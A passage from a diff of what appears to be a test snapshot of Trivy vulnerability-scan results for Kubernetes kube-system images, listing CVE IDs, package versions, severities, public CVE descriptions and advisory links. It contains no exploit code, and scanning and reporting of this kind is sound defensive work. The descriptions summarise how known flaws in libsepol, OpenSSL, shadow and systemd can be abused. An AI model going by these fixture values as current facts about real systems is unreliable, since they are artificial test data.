"The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", - }, - { - "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://avd.aquasec.com/nvd/cve-2021-36085", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://access.redhat.com/security/cve/CVE-2021-36085", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "247.3-7", - "packageName": "libudev1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", - ], - }, - "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", }, ], "severity": "LOW", @@ -84888,148 +86177,122 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "libxtables12", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36086", + "installedVersion": "2.8-1", + "packageName": "libsepol1", "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "https://access.redhat.com/security/cve/CVE-2021-36086", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "https://linux.oracle.com/cve/CVE-2021-36086.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36086", ], }, "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "name": "use-after-free in cil_reset_classpermission()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://avd.aquasec.com/nvd/cve-2021-36086", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-36086", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4899", - "installedVersion": "1.4.8+dfsg-2.1", - "packageName": "libzstd1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-4899", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", - "https://github.com/facebook/zstd/issues/3200", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", - "https://www.cve.org/CVERecord?id=CVE-2022-4899", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "buffer overrun in util.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4899", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4899", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://github.com/facebook/zstd/issues/3200", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.8.1-1", - "packageName": "login", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", }, ], "severity": "LOW", @@ -85037,1256 +86300,1082 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.8.1-1", - "packageName": "login", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36087", + "installedVersion": "2.8-1", + "packageName": "libsepol1", "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "https://access.redhat.com/security/cve/CVE-2021-36087", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "https://linux.oracle.com/cve/CVE-2021-36087.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36087", ], }, "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", - }, - { - "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://avd.aquasec.com/nvd/cve-2021-36087", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://access.redhat.com/security/cve/CVE-2021-36087", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.8.1-1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", - ], - }, - "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.8.1-1", - "packageName": "login", + "fixedVersion": "1.1.1d-0+deb10u7", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3711", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/security/cve/CVE-2021-3711", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://security.netapp.com/advisory/ntap-20211022-0003/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", ], }, "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", + "name": "openssl: SM2 Decryption Buffer Overflow", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "https://avd.aquasec.com/nvd/cve-2021-3711", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "https://access.redhat.com/security/cve/CVE-2021-3711", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - 